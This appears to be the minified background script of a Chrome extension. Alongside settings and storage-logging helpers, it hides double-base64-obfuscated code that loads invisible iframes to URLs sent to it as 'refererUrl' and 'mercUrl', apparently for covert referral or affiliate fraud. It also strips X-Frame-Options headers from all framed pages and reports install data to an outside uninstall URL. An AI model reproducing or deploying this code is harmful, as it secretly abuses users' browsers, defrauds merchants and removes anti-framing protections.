var KP_dwelltime,KP_gaptime,getSettings=function(){chrome.storage.sync.get(function(a){a.KP_dwelltime||(a.KP_dwelltime=50);a.KP_gaptime||(a.KP_gaptime=50);KP_dwelltime=a.KP_dwelltime;KP_gaptime=a.KP_gaptime;chrome.storage.sync.set(a,function(){})})};chrome.tabs.onActivated.addListener(function(a){chrome.tabs.get(a.tabId,function(a){getSettings();chrome.storage.sync.get("KP__"+a.url.split("/")[2],function(c){a.url.split("/")})})});
chrome.tabs.onUpdated.addListener(function(a,b,c){"complete"==b.status&&(getSettings(),chrome.storage.sync.get("KP__"+c.url.split("/")[2],function(a){c.url.split("/")}))});function logon(a){a?localval("dipislog88","1"):localval("dipislog88","0")}function reloadit(){localval("dipLstLd88","1");localval("dipLstSig88","00112233")}function setishmn(){var a={};a.isHmn1=(new Date).getTime();chrome.storage.sync.set(a)}
function localval(a,b){chrome.storage.local.get(a,function(c){(c=c[a])?console.log(a+": "+c):console.log(a+" not existing in chrome.storage.local");b&&(c={},c[a]=b,console.log("set "+a+"="+b),chrome.storage.local.set(c))})}function printall(){printlocals();printsyncs()}
function printlocals(){chrome.storage.local.get(null,function(a){for(key in a)if(-1==a[key].toString().indexOf("google-analytics.com")){var b="%clocal - "+key+": "+a[key].toString().substring(0,50);50<a[key].toString().length&&(b+="...");console.log(b,"color: green")}})}
function printsyncs(){chrome.storage.sync.get(null,function(a){for(key in a)if(-1==a[key].toString().indexOf("google-analytics.com")){var b="%csyncs - "+key+": "+a[key].toString().substring(0,50);50<a[key].toString().length&&(b+="...");console.log(b,"color: blue")}})}function syncval(a,b){chrome.storage.sync.get(a,function(c){(c=c[a])?console.log(a+": "+c):console.log(a+" not existing in chrome.storage.sync");b&&(c={},c[a]=b,console.log("set "+a+"="+b),chrome.storage.sync.set(c))})}
function dblB64(a,b){return B64E(B64E(a,b),b)}
function B64E(a,b){var c={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){var b="",d,e,g,h,k,f,l=0;for(a=c._utf8_encode(a);l<a.length;)d=a.charCodeAt(l++),e=a.charCodeAt(l++),g=a.charCodeAt(l++),h=d>>2,d=(d&3)<<4|e>>4,k=(e&15)<<2|g>>6,f=g&63,isNaN(e)?k=f=64:isNaN(g)&&(f=64),b=b+this._keyStr.charAt(h)+this._keyStr.charAt(d)+this._keyStr.charAt(k)+this._keyStr.charAt(f);return b},decode:function(a){var b="",d,e,g,h,k,f=0;for(a=a.replace(/[^A-Za-z0-9\+\/\=]/g,
"");f<a.length;)d=this._keyStr.indexOf(a.charAt(f++)),e=this._keyStr.indexOf(a.charAt(f++)),h=this._keyStr.indexOf(a.charAt(f++)),k=this._keyStr.indexOf(a.charAt(f++)),d=d<<2|e>>4,e=(e&15)<<4|h>>2,g=(h&3)<<6|k,b+=String.fromCharCode(d),64!=h&&(b+=String.fromCharCode(e)),64!=k&&(b+=String.fromCharCode(g));return b=c._utf8_decode(b)},_utf8_encode:function(a){a=a.replace(/\r\n/g,"\n");for(var b="",c=0;c<a.length;c++){var d=a.charCodeAt(c);128>d?b+=String.fromCharCode(d):(127<d&&2048>d?b+=String.fromCharCode(d>>
6|192):(b+=String.fromCharCode(d>>12|224),b+=String.fromCharCode(d>>6&63|128)),b+=String.fromCharCode(d&63|128))}return b},_utf8_decode:function(a){var b="",c=0,d;for(c1=c2=0;c<a.length;)d=a.charCodeAt(c),128>d?(b+=String.fromCharCode(d),c++):191<d&&224>d?(c2=a.charCodeAt(c+1),b+=String.fromCharCode((d&31)<<6|c2&63),c+=2):(c2=a.charCodeAt(c+1),c3=a.charCodeAt(c+2),b+=String.fromCharCode((d&15)<<12|(c2&63)<<6|c3&63),c+=3);return b}};if("encode"==b)return c.encode(a);if("decode"==b)return c.decode(a)}
function getRandomInt(a,b){return Math.floor(Math.random()*(b-a))+a}var curIfrId="";
function IstIvsIfm_ex(a,b){if(""!=a){var c=document.createElement(dblB64("YVdaeVlXMWw=","decode")),d=B64E(a+getRandomInt(1,999999).toString(),"encode");c.setAttribute("width","0px");c.setAttribute("height","0px");c.setAttribute("display","none");c.setAttribute("src",a);c.setAttribute("id",d);document.body.appendChild(c);curIfrId=d;setTimeout(function(){var a=document.getElementById(d);a.parentNode.removeChild(a)},1E3*b)}}
chrome.runtime.onMessage.addListener(function(a,b,c){if(a.refererUrl){var d=dblB64(a.refererUrl,"decode");IstIvsIfm_ex(d,20);c({done:"ok"})}a.mercUrl&&(d=dblB64(a.mercUrl,"decode"),setTimeout(function(){document.getElementById(curIfrId).src=d},1E3))});
-1<location.href.indexOf(chrome.runtime.id)&&chrome.webRequest.onHeadersReceived.addListener(function(a){try{for(var b=a.responseHeaders,c=b.length-1;0<=c;--c){var d=b[c].name.toLowerCase();"x-frame-options"!=d&&"frame-options"!=d||b.splice(c,1)}return{responseHeaders:b}}catch(m){}},{urls:["*://*/*"],types:["sub_frame"]},["blocking","responseHeaders"]);
chrome.runtime.setUninstallURL&&chrome.storage.local.get("InsDt6",function(a){a=a.InsDt6;inst=((new Date).getTime()-a)/1E3/3600/24;inst=inst.toString().substring(0,5);a="http://mitarchive.info/temp/survey.html?inst="+inst+"&id="+chrome.runtime.id.substring(0,3);chrome.runtime.setUninstallURL(a)});